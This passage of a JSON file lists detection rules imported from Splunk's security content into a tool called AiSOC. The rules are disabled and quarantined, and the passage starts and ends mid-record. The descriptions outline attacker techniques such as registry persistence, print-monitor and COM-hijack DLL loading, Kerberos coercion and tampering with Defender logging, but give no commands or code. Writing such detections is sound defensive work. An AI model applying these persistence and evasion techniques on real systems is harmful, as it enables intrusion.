Analysts should validate the writing process, value content, and whether the change aligns with trusted software deployment or administrative tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-anomalous-registry-value-length-in-environment-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5bde743-245a-4e1f-a152-3971cec6e9ef", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_anomalous_registry_value_length_in_environment_key.yml" } }, { "id": "splunk-security-content-f5c1f64b-db59-4913-991e-3dac8adff288", "type": "detection", "name": "Windows Default Rdp File Unhidden", "description": "This detection identifies the use of attrib.exe to remove hidden (-h) or system (-s) attributes from the Default.rdp file, which is automatically created in a user's Documents folder when a Remote Desktop Protocol (RDP) session is initiated using mstsc.exe. The Default.rdp file stores session configuration details such as the remote host address and screen settings. Unhiding this file is uncommon in normal user behavior and may indicate that an attacker or red team operator is attempting to access or manipulate RDP connection history that was previously hidden\u2014either by default or as part of an earlier anti-forensics effort. This activity may represent part of a broader pattern of reconnaissance or staging for credential reuse, lateral movement, or forensic analysis evasion. 
Monitoring for this behavior can help uncover suspicious manipulation of user artifacts and highlight interactive attacker activity on a compromised host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-rdp-file-unhidden.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5c1f64b-db59-4913-991e-3dac8adff288", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_rdp_file_unhidden.yml" } }, { "id": "splunk-security-content-f5f6af30-7aa7-4295-bfe9-07fe87c01a4b", "type": "detection", "name": "Registry Keys Used For Persistence", "description": "The following analytic identifies modifications to registry keys commonly used for persistence mechanisms. It leverages data from endpoint detection sources like Sysmon or Carbon Black, focusing on specific registry paths known to initiate applications or services during system startup. This activity is significant as unauthorized changes to these keys can indicate attempts to maintain persistence or execute malicious actions upon system boot. 
If confirmed malicious, this could allow attackers to achieve persistent access, execute arbitrary code, or maintain control over compromised systems, posing a severe threat to system integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/registry-keys-used-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5f6af30-7aa7-4295-bfe9-07fe87c01a4b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/registry_keys_used_for_persistence.yml" } }, { "id": "splunk-security-content-f5f6af30-7aa7-4295-bfe9-07fe87c01bbb", "type": "detection", "name": "Registry Keys for Creating SHIM Databases", "description": "The following analytic detects registry activity related to the creation of application compatibility shims. It leverages data from the Endpoint.Registry data model, specifically monitoring registry paths associated with AppCompatFlags. This activity is significant because attackers can use shims to bypass security controls, achieve persistence, or escalate privileges. 
If confirmed malicious, this could allow an attacker to maintain long-term access, execute arbitrary code, or manipulate application behavior, posing a severe risk to the integrity and security of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/registry-keys-for-creating-shim-databases.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5f6af30-7aa7-4295-bfe9-07fe87c01bbb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/registry_keys_for_creating_shim_databases.yml" } }, { "id": "splunk-security-content-f5f6af30-7ba7-4295-bfe9-07de87c01bbc", "type": "detection", "name": "Monitor Registry Keys for Print Monitors", "description": "The following analytic detects modifications to the registry key `HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors`. It leverages data from the Endpoint.Registry data model, focusing on events where the registry path is modified. This activity is significant because attackers can exploit this registry key to load arbitrary .dll files, which will execute with elevated SYSTEM permissions and persist after a reboot. 
If confirmed malicious, this could allow attackers to maintain persistence, execute code with high privileges, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/monitor-registry-keys-for-print-monitors.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f5f6af30-7ba7-4295-bfe9-07de87c01bbc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/monitor_registry_keys_for_print_monitors.yml" } }, { "id": "splunk-security-content-f616c4f3-bde9-41cf-856c-019b65f668bb", "type": "detection", "name": "Linux Auditd Database File And Directory Discovery", "description": "The following analytic detects suspicious database file and directory discovery activities, which may signal an attacker's attempt to locate and assess critical database assets on a compromised system. This behavior is often a precursor to data theft, unauthorized access, or privilege escalation, as attackers seek to identify valuable information stored in databases. 
By monitoring for unusual or unauthorized attempts to locate database files and directories, this analytic aids in early detection of potential reconnaissance or data breach efforts, enabling security teams to respond swiftly and mitigate the risk of further compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-database-file-and-directory-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f616c4f3-bde9-41cf-856c-019b65f668bb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_database_file_and_directory_discovery.yml" } }, { "id": "splunk-security-content-f6343e86-6e09-11ec-9376-acde48001122", "type": "detection", "name": "Linux Doas Conf File Creation", "description": "The following analytic detects the creation of the doas.conf file on a Linux host. This file is used by the doas utility to allow standard users to perform tasks as root, similar to sudo. The detection leverages filesystem data from the Endpoint data model, focusing on the creation of the doas.conf file. This activity is significant because it can indicate an attempt to gain elevated privileges, potentially by an adversary. 
If confirmed malicious, this could allow an attacker to execute commands with root privileges, leading to full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-doas-conf-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6343e86-6e09-11ec-9376-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_doas_conf_file_creation.yml" } }, { "id": "splunk-security-content-f63c34fe-a435-11eb-935a-acde48001122", "type": "detection", "name": "Executable File Written in Administrative SMB Share", "description": "The following analytic detects executable files (.exe or .dll) being written to Windows administrative SMB shares (Admin$, IPC$, C$). It leverages Windows Security Event Logs with EventCode 5145 to identify this activity. This behavior is significant as it is commonly used by tools like PsExec/PaExec for staging binaries before creating and starting services on remote endpoints, a technique often employed for lateral movement and remote code execution. 
If confirmed malicious, this activity could allow an attacker to execute arbitrary code remotely, potentially compromising additional systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/executable-file-written-in-administrative-smb-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f63c34fe-a435-11eb-935a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/executable_file_written_in_administrative_smb_share.yml" } }, { "id": "splunk-security-content-f64579c0-203f-11ec-abcc-acde48001122", "type": "detection", "name": "Active Setup Registry Autostart", "description": "The following analytic detects suspicious modifications to the Active Setup registry for persistence and privilege escalation. It leverages data from the Endpoint.Registry data model, focusing on changes to the \"StubPath\" value within the \"SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\" path. This activity is significant as it is commonly used by malware, adware, and APTs to maintain persistence on compromised machines. 
If confirmed malicious, this could allow attackers to execute code upon system startup, potentially leading to further system compromise and unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/active-setup-registry-autostart.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f64579c0-203f-11ec-abcc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/active_setup_registry_autostart.yml" } }, { "id": "splunk-security-content-f64da023-b988-4775-8d57-38e512beb56e", "type": "detection", "name": "GetDomainComputer with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-DomainComputer` commandlet using PowerShell Script Block Logging (EventCode=4104). This commandlet is part of PowerView, a tool often used for enumerating domain computers within Windows environments. The detection leverages script block text analysis to identify this specific command. Monitoring this activity is crucial as it can indicate an adversary's attempt to gather information about domain computers, which is a common step in Active Directory reconnaissance. 
If confirmed malicious, this activity could lead to further network enumeration and potential lateral movement within the domain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaincomputer-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f64da023-b988-4775-8d57-38e512beb56e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaincomputer_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-f65aa026-b811-42ab-b4b9-d9088137648f", "type": "detection", "name": "Windows Unusual Count Of Disabled Users Failed Auth Using Kerberos", "description": "The following analytic identifies a source endpoint failing to authenticate with multiple disabled domain users using the Kerberos protocol. It leverages EventCode 4768, which is generated when the Key Distribution Center issues a Kerberos Ticket Granting Ticket (TGT) and detects failure code `0x12` (credentials revoked). This behavior is significant as it may indicate a Password Spraying attack targeting disabled accounts, potentially leading to initial access or privilege escalation. 
If confirmed malicious, attackers could gain unauthorized access or elevate privileges within the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-count-of-disabled-users-failed-auth-using-kerberos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f65aa026-b811-42ab-b4b9-d9088137648f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_count_of_disabled_users_failed_auth_using_kerberos.yml" } }, { "id": "splunk-security-content-f6601940-4c74-11ec-b9b7-3e22fbd008af", "type": "detection", "name": "Mmc LOLBAS Execution Process Spawn", "description": "The following analytic identifies `mmc.exe` spawning a LOLBAS execution process. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where `mmc.exe` is the parent process. This activity is significant because adversaries can abuse the DCOM protocol and MMC20 COM object to execute malicious code, using Windows native binaries documented by the LOLBAS project. 
If confirmed malicious, this behavior could indicate lateral movement, allowing attackers to execute code remotely, potentially leading to further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003", "T1218.014" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mmc-lolbas-execution-process-spawn.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6601940-4c74-11ec-b9b7-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/mmc_lolbas_execution_process_spawn.yml" } }, { "id": "splunk-security-content-f6ea3466-d6bb-11ea-87d0-0242ac130003", "type": "detection", "name": "Detect New Open GCP Storage Buckets", "description": "The following analytic identifies the creation of new open/public GCP Storage buckets. It leverages GCP PubSub events, specifically monitoring for the `storage.setIamPermissions` method and checks if the `allUsers` member is added. This activity is significant because open storage buckets can expose sensitive data to the public, posing a severe security risk. 
If confirmed malicious, an attacker could access, modify, or delete data within the bucket, leading to data breaches and potential compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-open-gcp-storage-buckets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6ea3466-d6bb-11ea-87d0-0242ac130003", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_new_open_gcp_storage_buckets.yml" } }, { "id": "splunk-security-content-f6ee02d6-fea0-11eb-b2c2-acde48001122", "type": "detection", "name": "Gsuite Drive Share In External Email", "description": "The following analytic detects Google Drive or Google Docs files shared externally from an internal domain. It leverages GSuite Drive logs, extracting and comparing the source and destination email domains to identify external sharing. This activity is significant as it may indicate potential data exfiltration by an attacker or insider. If confirmed malicious, this could lead to unauthorized access to sensitive information, data leakage, and potential compliance violations. 
Monitoring this behavior helps in early detection and mitigation of data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-drive-share-in-external-email.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6ee02d6-fea0-11eb-b2c2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_drive_share_in_external_email.yml" } }, { "id": "splunk-security-content-f6f904c4-1ac0-11ec-806b-acde48001122", "type": "detection", "name": "Suspicious Image Creation In Appdata Folder", "description": "The following analytic detects the creation of image files in the AppData folder by processes that also have a file reference in the same folder. It leverages data from the Endpoint.Processes and Endpoint.Filesystem datamodels to identify this behavior. This activity is significant because it is commonly associated with malware, such as the Remcos RAT, which captures screenshots and stores them in the AppData folder before exfiltrating them to a command-and-control server. 
If confirmed malicious, this activity could indicate unauthorized data capture and exfiltration, compromising sensitive information and user privacy.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-image-creation-in-appdata-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6f904c4-1ac0-11ec-806b-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_image_creation_in_appdata_folder.yml" } }, { "id": "splunk-security-content-f6fbe929-4187-4ba4-901e-8a34be838443", "type": "detection", "name": "Windows Process Execution in Temp Dir", "description": "The following analytic identifies processes running from %temp% directory file paths. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific process paths within the Endpoint data model. This activity is significant because adversaries often use unconventional file paths to execute malicious code without requiring administrative privileges. 
If confirmed malicious, this behavior could indicate an attempt to bypass security controls, leading to unauthorized software execution, potential system compromise, and further malicious activities within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-execution-in-temp-dir.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f6fbe929-4187-4ba4-901e-8a34be838443", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_execution_in_temp_dir.yml" } }, { "id": "splunk-security-content-f709e736-3e6c-492f-b865-bc7696cc24a7", "type": "detection", "name": "GitHub Enterprise Repository Deleted", "description": "The following analytic detects when a user deletes a repository in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for repository deletion events, which could indicate unauthorized removal of critical source code and project resources. For a SOC, identifying repository deletions is crucial as it may signal account compromise, insider threats, or malicious attempts to destroy intellectual property and disrupt development operations. The impact could be severe, potentially resulting in permanent loss of source code, documentation, project history, and other critical assets if proper backups are not maintained. 
Repository deletion could halt development workflows, cause significant business disruption, and require substantial effort to restore from backups if available. Additionally, unauthorized repository removal could be part of a larger attack campaign aimed at destroying or compromising enterprise assets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-repository-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f709e736-3e6c-492f-b865-bc7696cc24a7", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_repository_deleted.yml" } }, { "id": "splunk-security-content-f75b7f1a-b8eb-4975-a214-ff3e0a944757", "type": "detection", "name": "AWS High Number Of Failed Authentications From Ip", "description": "The following analytic detects an IP address with 20 or more failed authentication attempts to the AWS Web Console within a 5-minute window. This detection leverages CloudTrail logs, aggregating failed login events by IP address and time span. This activity is significant as it may indicate a brute force attack aimed at gaining unauthorized access or escalating privileges within an AWS environment. 
If confirmed malicious, this could lead to unauthorized access, data breaches, or further exploitation of AWS resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-high-number-of-failed-authentications-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f75b7f1a-b8eb-4975-a214-ff3e0a944757", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_high_number_of_failed_authentications_from_ip.yml" } }, { "id": "splunk-security-content-f79c5d7a-dd99-4263-93e1-49ace5634c82", "type": "detection", "name": "Windows Credential Target Information Structure in Commandline", "description": "Detects DNS-based Kerberos coercion attacks where adversaries inject marshaled credential structures into DNS records to spoof SPNs and redirect authentication such as in CVE-2025-33073. 
This detection leverages process creation events looking for specific CREDENTIAL_TARGET_INFORMATION structures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1557.001", "T1187", "T1071.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credential-target-information-structure-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f79c5d7a-dd99-4263-93e1-49ace5634c82", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credential_target_information_structure_in_commandline.yml" } }, { "id": "splunk-security-content-f7abfab9-12ea-44e8-8745-475f9ca6e0a4", "type": "detection", "name": "Windows Event Triggered Image File Execution Options Injection", "description": "The following analytic identifies the creation or modification of Image File Execution Options (IFEO) registry keys, detected via EventCode 3000 in the Application channel. This detection leverages Windows Event Logs to monitor for process names added to IFEO under specific registry paths. This activity is significant as it can indicate attempts to set traps for process monitoring or debugging, often used by attackers for persistence or evasion. 
If confirmed malicious, this could allow an attacker to execute arbitrary code or manipulate process behavior, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-event-triggered-image-file-execution-options-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7abfab9-12ea-44e8-8745-475f9ca6e0a4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_event_triggered_image_file_execution_options_injection.yml" } }, { "id": "splunk-security-content-f7bb956f-b956-42a5-8c2c-ff9cdbbf7526", "type": "detection", "name": "Windows SpeechRuntime Suspicious Child Process", "description": "SpeechRuntime is vulnerable to an attack that allows a user to run code on another user's session remotely and stealthily by exploiting a Windows COM class. When this class is invoked, it launches SpeechRuntime.exe in the context of the currently logged-on user. Because this COM class is susceptible to COM Hijacking, the attacker can alter the registry remotely to point to a malicious DLL. By dropping that DLL on the target system (e.g., via SMB) and triggering the COM object, the attacker causes the malicious DLL to load into SpeechRuntime.exe and execute under the user's context. 
This detection identifies suspicious child processes of SpeechRuntime.exe that could indicate abuse of this vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-speechruntime-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7bb956f-b956-42a5-8c2c-ff9cdbbf7526", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_speechruntime_suspicious_child_process.yml" } }, { "id": "splunk-security-content-f7da5fca-9261-43de-a4d0-130dad1e4f4d", "type": "detection", "name": "Windows Impair Defense Change Win Defender Throttle Rate", "description": "The following analytic detects modifications to the ThrottleDetectionEventsRate registry setting in Windows Defender. It leverages data from the Endpoint.Registry datamodel to identify changes in the registry path related to Windows Defender's event logging rate. This activity is significant because altering the ThrottleDetectionEventsRate can reduce the frequency of logged detection events, potentially masking malicious activities. 
If confirmed malicious, this could allow an attacker to evade detection by decreasing the visibility of security events, thereby hindering incident response and forensic investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-change-win-defender-throttle-rate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7da5fca-9261-43de-a4d0-130dad1e4f4d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_change_win_defender_throttle_rate.yml" } }, { "id": "splunk-security-content-f7e5e792-d907-46c1-a58e-4ff974dc462a", "type": "detection", "name": "Cisco Secure Firewall - Connection to File Sharing Domain", "description": "The following analytic detects outbound connections to commonly abused file sharing and pastebin-style hosting domains. It leverages Cisco Secure Firewall Threat Defense logs and focuses on allowed connections (action=Allow) where the url field matches a list of known data hosting or temporary storage services. While many of these platforms serve legitimate purposes, they are frequently leveraged by adversaries for malware delivery, data exfiltration, command and control (C2) beacons, or staging of encoded payloads. This analytic is valuable for identifying potential abuse of legitimate infrastructure as part of an attacker's kill chain. 
If confirmed malicious, this activity may indicate tool staging, credential dumping, or outbound data leaks over HTTP(S).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1090.002", "T1105", "T1567.002", "T1588.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-connection-to-file-sharing-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "f7e5e792-d907-46c1-a58e-4ff974dc462a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___connection_to_file_sharing_domain.yml" } }, { "id": "splunk-security-content-f7eda4bc-871c-11eb-b110-acde48001122", "type": "detection", "name": "Process Deleting Its Process File Path", "description": "The following analytic identifies a process attempting to delete its own file path, a behavior often associated with defense evasion techniques. This detection leverages Sysmon EventCode 1 logs, focusing on command lines executed via cmd.exe that include deletion commands. This activity is significant as it may indicate malware, such as Clop ransomware, trying to evade detection by removing its executable file if certain conditions are met. 
